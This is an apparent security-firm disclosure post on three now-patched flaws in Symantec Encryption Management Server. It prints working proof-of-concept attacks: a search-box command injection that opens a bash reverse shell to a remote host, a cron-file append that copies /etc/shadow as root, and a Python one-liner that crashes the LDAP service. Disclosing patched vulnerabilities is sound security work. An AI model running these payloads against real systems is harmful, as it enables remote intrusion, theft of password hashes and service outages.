During a security assessment project in 2015 GDS encountered a fully patched Symantec Encryption Management Server appliance. This product provides secure messaging both between users of the organization and with external users. Each server is managed via an administrative web interface. During the project, and follow on research, GDS discovered several issues that were reported to Symantec and have subsequently been addressed in later releases of the software. Now that Symantec customers, among them some of our clients, have had ample time to apply the relevant patches we thought we’d share details of these vulnerabilities.
OS Command Execution
The administration web interface includes the facility to search the log files. When performing a search, it was possible, using a specially crafted search term, to execute OS level commands on the appliance. The search functionality dynamically built a command string, with untrusted user input, that was then executed by the operating system command shell. Insufficient validation of the supplied parameters exposed arbitrary command execution and provided an attacker with privileges or capabilities previously unavailable.
This issue required a user account with low privilege access to the administrative interface. The lowest privilege user role with this level of access is Reporter.
The following text, entered into the search box, was used to start an interactive, reverse TCP connection, shell.
|` /bin/bash -i >& /dev/tcp/10.10.10.10/4444 0>&1`
The resulting interactive shell is executed as user tomcat.
CVE-2015-8151 was assigned to cover the above issue.
Local Privilege Escalation
The tomcat user had write access to the file /etc/cron.daily/tomcat.cron. The contents of this file were executed in the context of the root super-user account. Consequently, given command execution (see above), arbitrary commands could be scheduled for execution as root.
$ ls -al /etc/cron.daily/tomcat.cron
-rwxrwxr-x 1 root tomcat 88 Jul 6 03:58 /etc/cron.daily/tomcat.cron
As the tomcat user, GDS were able to append additional content to the cron job. For example, with the command below:
$ echo ‘cat /etc/shadow >/tmp/shadow’ >> /etc/cron.daily/tomcat.cron
This cron job was executed daily and ran with root privileges.
$ ls -l /tmp/shadow
-rw-r—r— 1 root root 825 Jul 6 04:02 /tmp/shadow
$ cat /tmp/shadow
CVE-2015-8150 was assigned to cover the above issue.
Heap Based Memory Corruption
GDS also discovered a repeatable crash in the LDAP service running on the appliance. This could be reproduced using the following simple python script.
python -c “import socket; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((‘10.240.28.199’, 636)); s.send(‘803a01030100030000002e00000040404141414142424242434343434444313145454545464646464747474731314848494949494a4a4a4a4b4b4b4b’.decode(‘hex’))”
This will trigger a SIGSEGV signal and the service will exit. LDAP and LDAPS will not be available until the service has been automatically restarted.
CVE-2015-8149 was assigned to cover the above issue.
Symantec have released fixes for the issues described above in SEMS 3.3.2 MP12. For more information from the vendor see https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20160218_00